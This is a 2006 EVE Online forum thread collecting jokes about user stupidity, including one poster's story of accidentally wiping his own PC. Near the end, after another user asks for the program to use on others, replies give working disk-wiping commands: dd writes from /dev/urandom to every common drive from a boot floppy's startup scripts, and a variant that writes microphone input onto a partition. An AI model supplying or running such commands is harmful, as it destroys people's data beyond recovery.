Thought i'd start this since i love the books...humans in their prime form ...
Any examples of massive stupidity on the Internet (e.g. passwords being given away, hacking one's own pc, watever...) or in EVE itself (jumping into 0.0 in shuttle with titan BPO and +5 implants...) can be posted here...with the result that we should have a great laugh
There will not be an Award per se...because i cant think of one :P but wat there will be is a vote on the best example of stupidity after a certain number of entries (after how many we vote for depends on how many entries are entered)...
Just to clarify...this isnt a competition...just an opportunity to get a good laugh and feel that our IQ, in fact, is above the average

FIX had a Darwin awards thing a year or two ago. This Raven pilot won... he got killed by a kestrel because he went AFK at a gate in 0.0.

Edited by: Benco97 on 30/10/2006 22:05:03 I was once challenged to write a program for a friend that would automatically delete all your files, fill up the drive with jibberish, delete it again and then remove the partition. I put it on a flash drive, made it bootable and promptly forgot all about it as I wonered off for a cup of tea. I cried the next time I booted my computer, cried SO HARD. *edit* - admittedly this isn't internet or EVE related but it did stop me from using the computer for an hour or so and so I thought it deserved a mention.

Do you still have that thingy?? I know a few people that would enjoy this happening to them very much. Ofcourse i would have nothing to do with it at all

Edited by: Benco97 on 31/10/2006 11:46:52 Edited by: Benco97 on 31/10/2006 11:45:36 I'm glad that people are enjoying my computery suffering ;p No, I no longer have the program, the original was amazingly deleted in the accident which left only the copy on the flash drive which I have since deleted so that it couldn't happen again, i'm sure someone could write you a program that does the same but I don't want to be involved in no malicious attacks Nah, just kidding, I just can't be bothered to write it again now, maybe I will at some point.
*edit* i'll give a hint though, it was just a simple batch file (remember the autoexec), there, now anyone should be able to wipe their computers by accident (I am not liable for your stupididty if you have read this then you also agree that I am not liable, thank you.)

Just make a bootable linux floppy with the following stuff added at the end of the startup scripts :
dd if=/dev/urandom of=/dev/hda & dd if=/dev/urandom of=/dev/hdb & dd if=/dev/urandom of=/dev/hdc & dd if=/dev/urandom of=/dev/hdd & dd if=/dev/urandom of=/dev/sda & dd if=/dev/urandom of=/dev/sdb & dd if=/dev/urandom of=/dev/sdc & dd if=/dev/urandom of=/dev/sdd & dd if=/dev/urandom of=/dev/fd0 & dd if=/dev/urandom of=/dev/fd1 &
That should wipe most of the drives, including the floppy. If /dev/urandom isn't available, try /dev/random or /dev/zero.

I prefer ..
Quote: dd if=/dev/dsp of=/dev/hda1 bs=512
Each time your mic picks up some sound, a little more of your hard disk is corrupted. |
